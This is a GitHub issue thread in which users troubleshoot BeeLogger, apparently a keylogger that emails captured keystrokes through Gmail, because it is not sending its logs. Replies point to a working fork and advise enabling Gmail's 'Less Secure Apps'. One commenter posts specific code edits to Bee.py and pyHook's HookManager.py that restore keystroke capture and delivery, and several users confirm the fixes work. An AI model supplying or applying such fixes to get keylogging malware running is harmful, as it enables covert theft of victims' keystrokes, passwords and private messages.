Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Beelogger is not sending logs. #76

Open
miguelm9 opened this issue May 24, 2018 · 8 comments
Open

Beelogger is not sending logs. #76

miguelm9 opened this issue May 24, 2018 · 8 comments

Comments

@miguelm9
Copy link

So, I downloaded the version that should work of BeeLogger, but I still don't get the logs. I read that people had the same issue but the managed to fixed through another version. Can anyone please help me?
Thanks.

@quantumcore
Copy link

Delete BeeLogger and clone from this Link https://github.com/jinwei908/BeeLogger

@miguelm9
Copy link
Author

@fastisbac I already did. Still does not work.

@quantumcore
Copy link

It's working for me. Try enabling Less Secure Apps in Gmail Settings.

@miguelm9
Copy link
Author

@fastisbac It is ON already.

@dimskiOf
Copy link

dimskiOf commented Nov 6, 2018

@nerviosus
there are 2 ways to solve the problem:

  1. You need to replace the python code in the Bee.py file in the template folder, in the folder beelogger there is a template folder and look for the code (ironm = win32event.CreateMutex) in Bee.py file delete the code after that

still in the same file, find the code (global data, lastWindow) delete the code (lastWindow) so that it becomes (global data) add the code after the code (window = event.WindowName)

lastWindow = "" (using quotation)
globals () [lastWindow] = 1000

add the code

  1. find the file in .wine named (HookManager.py) in the folder "C: \ Python27 \ Lib \ site-packages \ pyHook" open the file and look for the code (event = KeyboardEvent)
    change the code "func = self.keyboard_funcs.get (msg)" to

"func = self.keyboard_funcs.get (int (str (msg)))" (without quotes)

if you are still confused contact my email "linux.swapp@gmail.com" I will give you a file that has been repaired

@SOocoOT
Copy link

SOocoOT commented Nov 16, 2018

Delete BeeLogger and clone from this Link https://github.com/jinwei908/BeeLogger

Worked for me.

but in received logs Unicode character are represented by ? mark !!!

how to fix this ??

@erickpiloto
Copy link

erickpiloto commented May 5, 2019

@nerviosus
there are 2 ways to solve the problem:

1. You need to replace the python code in the Bee.py file in the template folder, in the folder beelogger there is a template folder and look for the code (ironm = win32event.CreateMutex) in Bee.py file delete the code after that

still in the same file, find the code (global data, lastWindow) delete the code (lastWindow) so that it becomes (global data) add the code after the code (window = event.WindowName)

lastWindow = "" (using quotation)
globals () [lastWindow] = 1000

add the code

1. find the file in .wine named (HookManager.py) in the folder "C: \ Python27 \ Lib \ site-packages \ pyHook" open the file and look for the code (event = KeyboardEvent)
   change the code "func = self.keyboard_funcs.get (msg)" to

"func = self.keyboard_funcs.get (int (str (msg)))" (without quotes)

if you are still confused contact my email "linux.swapp@gmail.com" I will give you a file that has been repaired

I'm with same problem of not sending logs. I'll try this 1st way to fix it. I come back to tell if works. But i'm almost writing a new script inspired in Beelogger.

[EDIT]
Fixed with 1st way above. Works great now!

@truesamurai
Copy link

Delete BeeLogger and clone from this Link https://github.com/jinwei908/BeeLogger

This version does not send me logging, but the clone you suggest here is working perfectly. Thanks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

6 participants